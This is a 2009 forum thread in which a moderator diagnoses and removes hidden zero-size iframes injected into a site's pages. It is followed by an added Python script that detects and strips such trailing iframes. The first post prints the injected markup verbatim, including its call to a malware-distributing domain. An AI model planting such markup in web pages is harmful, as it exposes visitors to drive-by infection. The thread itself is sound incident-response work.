Author Topic: Virus warning!  (Read 1828 times)

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
Re: Virus warning!
« on: September 05, 2009, 09:22:32 PM »
I've downloaded the page with wget and it has the following HTML appended outside the closing HTML tag:

Code:
<iframe src=http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
From Google's Safe Browsing diagnostic:

Quote
What is the current listing status for davtraff.com?

    Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

    Of the 284 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-09-05, and the last time suspicious content was found on this site was on 2009-09-05.

    Malicious software includes 405 trojan(s), 219 exploit(s), 1 scripting exploit(s).

    This site was hosted on 5 network(s) including AS18106 (VIEWQWEST), AS48974 (MFOREX), AS49314 (NEVAL).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, davtraff.com appeared to function as an intermediary for the infection of 213 site(s) including pcu.ac.kr/, sisa0582.com/, tryonpalace.org/.

This doesn't look like a false positive to me...
« Last Edit: September 05, 2009, 09:25:33 PM by Karlos »
int p; // A
 

Offline Karlos
Re: Virus warning!
« Reply #1 on: September 05, 2009, 09:32:53 PM »
Ok guys. I have confirmed that the iframe HTML was appended to the file somehow and have removed the iframe from the source file.

I've let Wayne know directly. I'll see if I can confirm whether or not any other pages have been touched.
int p; // A
 

Offline Karlos
Re: Virus warning!
« Reply #2 on: September 06, 2009, 12:02:56 AM »
Right folks, I've written a script that identifies and removes this infection from any file on the site. Luckily, it was only a few files, most of which were "dummy" index files used to hide directory contents.

The files that were affected were only modified yesterday.

Please check your malware tools again and let me know if you still see anything.
int p; // A
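
One way to run the kind of sweep described in the last post, as an added example that is not Karlos's script (the thread does not show it): it flags zero-size iframes sitting after the closing </html> tag and can strip them, keeping a .bak copy of each file. The function names, the scanned file extensions and the example.invalid sample are assumptions made for this illustration.

```python
import re
from pathlib import Path

HTML_CLOSE = re.compile(rb"</html\s*>", re.IGNORECASE)
IFRAME = re.compile(rb"<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
# Zero width/height, quoted or not, as in the markup quoted in the first post.
ZERO_SIZE = re.compile(rb"\b(?:width|height)\s*=\s*[\"']?0\b", re.IGNORECASE)
EXTENSIONS = {".html", ".htm", ".php"}  # assumption: file types worth scanning

# Constructed sample: a legitimate iframe in the body, two injected ones after </html>.
SAMPLE = (b'<html><body><iframe src="/map.html" width=300 height=200></iframe>'
          b'</body></html>\n'
          b'<iframe src=http://example.invalid/x" width=0 height=0 style="hidden"></iframe>'
          b'<iframe src="http://example.invalid/x" width=0 height=0></iframe>')

def split_trailer(data):
    """Split after the last </html>; the trailer is empty if there is no such tag."""
    last = None
    for last in HTML_CLOSE.finditer(data):
        pass
    return (data, b"") if last is None else (data[:last.end()], data[last.end():])

def find_injected(data):
    """Return the zero-size iframes found after the closing </html> tag."""
    _, trailer = split_trailer(data)
    return [m.group(0) for m in IFRAME.finditer(trailer) if ZERO_SIZE.search(m.group(0))]

def clean(data):
    """Drop zero-size trailing iframes; other trailing content is left for manual review."""
    doc, trailer = split_trailer(data)
    keep = lambda m: b"" if ZERO_SIZE.search(m.group(0)) else m.group(0)
    return doc + IFRAME.sub(keep, trailer)

def scan_tree(root, fix=False):
    """Map each affected file under root to its injected-iframe count; optionally clean it."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        data = path.read_bytes()
        found = find_injected(data)
        if found:
            hits[str(path)] = len(found)
            if fix:
                # Keep the original bytes as evidence before rewriting the file.
                path.with_name(path.name + ".bak").write_bytes(data)
                path.write_bytes(clean(data))
    return hits
```

Run `scan_tree(root)` first to list affected files and compare their modification times, then `scan_tree(root, fix=True)` once the list looks right.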